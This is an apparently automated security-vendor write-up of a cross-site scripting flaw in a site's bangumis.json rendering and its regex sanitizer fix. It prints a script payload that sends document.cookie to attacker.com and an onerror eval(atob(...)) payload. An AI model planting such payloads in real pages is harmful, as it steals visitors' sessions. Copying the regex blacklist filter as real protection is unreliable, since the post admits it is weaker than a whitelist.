Back to Blog
high SEVERITY3 min read

sanitizeBangumiHtml() XSS Fix: insertAdjacentHTML RCE via JSON

A high-severity cross-site scripting vulnerability existed where untrusted JSON data from bangumis.json was rendered directly into the DOM using insertAdjacentHTML without sanitization. An attacker who could modify this external data source could execute arbitrary JavaScript in visitors' browsers. The fix introduces a dedicated sanitizeBangumiHtml() function that strips script tags, event handlers, and javascript: URLs before insertion.

O
By Orbis AppSec
•Technically reviewed by Anupam Mediratta•Published October 8, 2026•Reviewed October 8, 2026

Answer Summary

The affected code is the `initPagination()` function's `renderTasksInIdle()` path, which used `insertAdjacentHTML` with unsanitized HTML from `bangumis.json`. An attacker with write access to this JSON file—via supply chain compromise, CDN takeover, or repository injection—could execute arbitrary JavaScript in all site visitors' browsers, achieving session hijacking, credential theft, or defacement. The fix adds `sanitizeBangumiHtml()`, which filters `<script>` tags, `on*` event handlers, and `javascript:` URLs before passing content to `insertAdjacentHTML`. The CWE is unknown.

Vulnerability at a Glance

cweunknown
fixAdded sanitizeBangumiHtml() filter before insertAdjacentHTML calls
riskRemote code execution in browsers via compromised external data
languageJavaScript
root causeDirect insertion of untrusted JSON content into DOM without sanitization
vulnerabilityCross-Site Scripting (XSS)

Affected Versions

Affected not applicable (first-party code)
Fixed in commit fix applied
Ecosystem JavaScript (browser)
CVE / GHSA not assigned
CWE unknown

The Vulnerability Explained

The initPagination() function orchestrates progressive rendering of content fetched from bangumis.json. Within renderTasksInIdle(), the code takes HTML strings from this external JSON and inserts them directly into the DOM:

renderItemsInIdle(task.items, renderPage, (html) => {
  document.querySelectorAll(task.selector)[0].insertAdjacentHTML('beforeBegin', html);

The html parameter here contains raw HTML generated from bangumis.json entries. No validation, escaping, or sanitization occurred before insertAdjacentHTML executed. This is the critical gap: any malicious content in the JSON file becomes executable JavaScript in every visitor's browser.

An attacker with the ability to modify bangumis.json—through supply chain compromise, a poisoned CDN, compromised build infrastructure, or direct repository access—could embed payloads like:

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

Or more subtly:

<img src="x" onerror="eval(atob('ZmV0Y2goJy4uLyk='))">

Since bangumis.json is typically treated as trusted data (it's part of the site's own infrastructure), Content Security Policy directives often permit its origin, making this an effective bypass vector for sites with otherwise strict CSP configurations.

The real-world impact is severe: persistent XSS affecting every page load for every user, with the payload living in what appears to be legitimate site data rather than user input.

The Fix

The patch introduces sanitizeBangumiHtml(), a dedicated sanitization function called immediately before insertAdjacentHTML:

function sanitizeBangumiHtml(html) {
  return html
    .replace(/<script[^>]*>[\s\S]*?<\/script>/gi, '')
    .replace(/\s(on\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '')
    .replace(/(href|src)\s*=\s*(["'])\s*javascript:[^"']*\2/gi, '$1=$2#$2');
}

The fixed insertion becomes:

document.querySelectorAll(task.selector)[0].insertAdjacentHTML('beforeBegin', sanitizeBangumiHtml(html));

The three regex patterns address distinct attack vectors:

  1. <script[^>]*>[\s\S]*?<\/script> — Removes complete script blocks, including those with attributes like <script type="text/javascript">
  2. \s(on\w+)\s*=\s*... — Strips event handler attributes (onclick, onerror, onload, etc.) regardless of quote style
  3. javascript: URL neutralization — Replaces href="javascript:..." and src="javascript:..." with harmless # fragments, preserving the attribute structure to avoid breaking layout

This is a blacklist approach appropriate for this specific context: the expected bangumis.json content contains benign HTML markup, and the sanitization removes known-dangerous patterns. A whitelist approach (allowing only specific tags) would be more robust for untrusted user content, but the threat model here is compromised infrastructure, not malicious user input.

Key Takeaways

  • External JSON files are attack surface: Treat any data fetched at runtime—from CDNs, build artifacts, or configuration endpoints—as potentially hostile, even if you control the source
  • insertAdjacentHTML is not inherently safe: Unlike textContent, it parses and executes HTML; the safety depends entirely on input validation
  • Event handlers are XSS vectors in HTML context: The on* family of attributes execute JavaScript without needing <script> tags
  • javascript: URLs survive many naive filters: They require explicit neutralization, not just removal of <script> elements
  • Supply chain attacks target data, not just dependencies: Compromising static assets or JSON configuration files achieves the same execution as poisoned npm packages

How Orbis AppSec Detected This

Source: The bangumis.json data fetched at runtime

Sink: insertAdjacentHTML invoked with unsanitized HTML in renderTasksInIdle

Missing control: No sanitization between JSON parsing and DOM insertion; the html callback parameter flowed directly to the sink

CWE: unknown (XSS pattern)

Fix: Added sanitizeBangumiHtml() to strip script tags, event handlers, and javascript: URLs before DOM insertion

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

This vulnerability illustrates how modern web architectures create unexpected trust boundaries. A JSON file—seemingly static data—became an XSS delivery mechanism because the rendering pipeline assumed its own infrastructure was trustworthy. The sanitizeBangumiHtml() fix restores that boundary by treating all inserted HTML as potentially hostile, regardless of source. For developers, the lesson extends beyond this single function: any data that crosses from server to client, whether through APIs, JSON files, or build artifacts, requires validation at the point of execution.

Prevention and further reading

Frequently Asked Questions

Does sanitizeBangumiHtml() use a whitelist or blacklist approach for its filtering?

It uses a blacklist approach, removing `<script>` tags by regex, stripping `on*` event handler attributes, and neutralizing `javascript:` URLs by replacing them with `#` fragments.

Is the attack against insertAdjacentHTML dependent on the site using a CDN for bangumis.json?

No—any vector that lets an attacker modify bangumis.json works: compromised build pipeline, supply chain attack on dependencies, direct repository injection, or CDN cache poisoning all enable the same XSS payload delivery.

Why was insertAdjacentHTML chosen over safer alternatives like textContent or createElement?

The code needed to insert HTML fragments with structure; the vulnerability was the lack of sanitization, not the API choice itself. The fix preserves the HTML insertion capability while adding the necessary filtering.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #827

Related Articles

high

form.js jQuery Selector Construction: CWE-79 Quote-Breaking Fix

A defense-in-depth fix in the form.js initialization routine eliminates a jQuery selector injection vector where user-controlled category data was concatenated directly into a string literal. The vulnerable pattern at lines 47-48 of the form handler could allow malicious content to break out of the selector's quoted context and execute arbitrary jQuery methods.

high

ItemPicker `_commitTraitInput` XSS via Unescaped Trait Chip Rendering

The `_commitTraitInput` function in ItemPicker accepted arbitrary user input for trait values without sanitization, then rendered those values directly into HTML chip elements through `_updateList`. An attacker could inject malicious JavaScript payloads that executed when trait chips were displayed. The fix applies a strict whitelist filter removing all non-alphanumeric characters except spaces and hyphens.

high

formatObject() Leaves localStorage Keys Unescaped Before innerHTML

The `formatObject()` pretty-printer used to build the key-configuration storage viewer interpolated object keys and array key/value pairs directly into an HTML string that is later assigned with `innerHTML`. Only string *values* were passed through `escapeHtml()`, so a crafted key name persisted in `localStorage` could execute script every time a user opened the storage viewer. The fix wraps the index-pair branch and the object-key branch in `escapeHtml()`, keeping the raw path only for non-colo

high

Voice Assistant Widget XSS: Unsanitized Bot Messages Execute in

The voice assistant widget's `appendMessage` function had a critical cross-site scripting (XSS) vulnerability where bot messages were inserted directly into the DOM without sanitization, while user messages were escaped. An attacker controlling bot responses could inject and execute arbitrary JavaScript in the user's browser context. The fix applies HTML escaping to all message types uniformly.

critical

navbar.html Injection via innerHTML in loadNavbar.js

An Electron app's `loadNavbar.js` fetched `navbar.html` and wrote the response straight into `innerHTML`, so any script tags or event-handler attributes in that file would execute in the renderer. The fix adds a `sanitizeNavbarHtml` routine that parses the markup with `DOMParser` and strips `<script>` tags, `on*` attributes, and `srcdoc` before the content is injected into the DOM.

high

CVE-2026-4800: lodash Template Imports Allow Code Execution

CVE-2026-4800 affects lodash's `_.template()` templating API, where untrusted input reaching the `imports` option can lead to arbitrary code execution. The fix was shipped as a dependency upgrade from lodash 4.17.21 to 4.18.1 in the project's lockfile, though the PR itself notes it was never verified against the actual code paths in this repository.